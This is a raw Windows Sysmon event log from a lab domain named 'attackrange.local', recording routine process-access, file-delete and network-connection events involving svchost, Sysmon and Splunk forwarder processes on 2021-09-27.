09:05:28.669{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977510Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:28.669{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977509Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:28.669{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977508Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:28.669{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977507Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:28.669{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977506Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:28.669{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977505Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:28.669{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977504Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:28.669{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977503Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:28.669{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8958-6151-9A79-00000000FD01}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977502Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:28.669{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8958-6151-9A79-00000000FD01}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977501Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:28.654{69CF5F33-8958-6151-9A79-00000000FD01}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001048829Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:26.830{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53266-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048828Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:28.107{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD4DDD0313A8B172AB6B4A0F7D5537B4,SHA256=318C400A8207CD01F276F1C23D66CE31D4A843B5A57CE0CE6F6AE18C350B40F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977500Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:28.388{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7824617F5FA185225D343441012CCD90,SHA256=62D1D445139FB6B15DE003EEC352F1D150FE3E76A553BC352DE1122D195F7A47,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977499Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:28.142{69CF5F33-8957-6151-9979-00000000FD01}36923508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000977530Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:29.904{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=759D5309F19834A7BFBC4EC88F426AC5,SHA256=2609D9EBFCC6E57CB2074980A73B439853F0FF73BC67A3C0F08013F30661ACB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048832Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:29.659{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E1836191B6C954DFAB6E7278C33C74AA,SHA256=D6F68C34FC1F72A8D4BFC0C4BC60F3101303F2851C9ADD5325FC6462A972F8A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048831Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:29.659{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA28EB1BE263FD212AF2B6D5EE0505E9,SHA256=0D415F80011E11DD5BA957C3E9590EF6B7A28B1A44A81C6DB182E975EBAF280B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048830Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:29.208{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CDC99F787BD36D8CA17F4348F8BD083,SHA256=37B7E0B97B9BD63DCA38DDAD1B02582B711D641DC958E8990A6009E9E1D5F17E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977529Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:29.701{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4CC11F5DFEBF40C59CFB5B7400715D74,SHA256=82EBD844E233715124937895A599ACE390723ECCFD7FDC47DFE42CB95B81EDD6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977528Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:29.529{69CF5F33-8959-6151-9B79-00000000FD01}25002688C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977527Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:29.357{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8959-6151-9B79-00000000FD01}2500C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977526Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:29.357{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977525Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:29.357{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977524Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:29.357{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977523Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:29.357{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977522Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:29.357{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977521Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:29.357{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977520Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:29.357{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977519Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:29.357{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977518Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 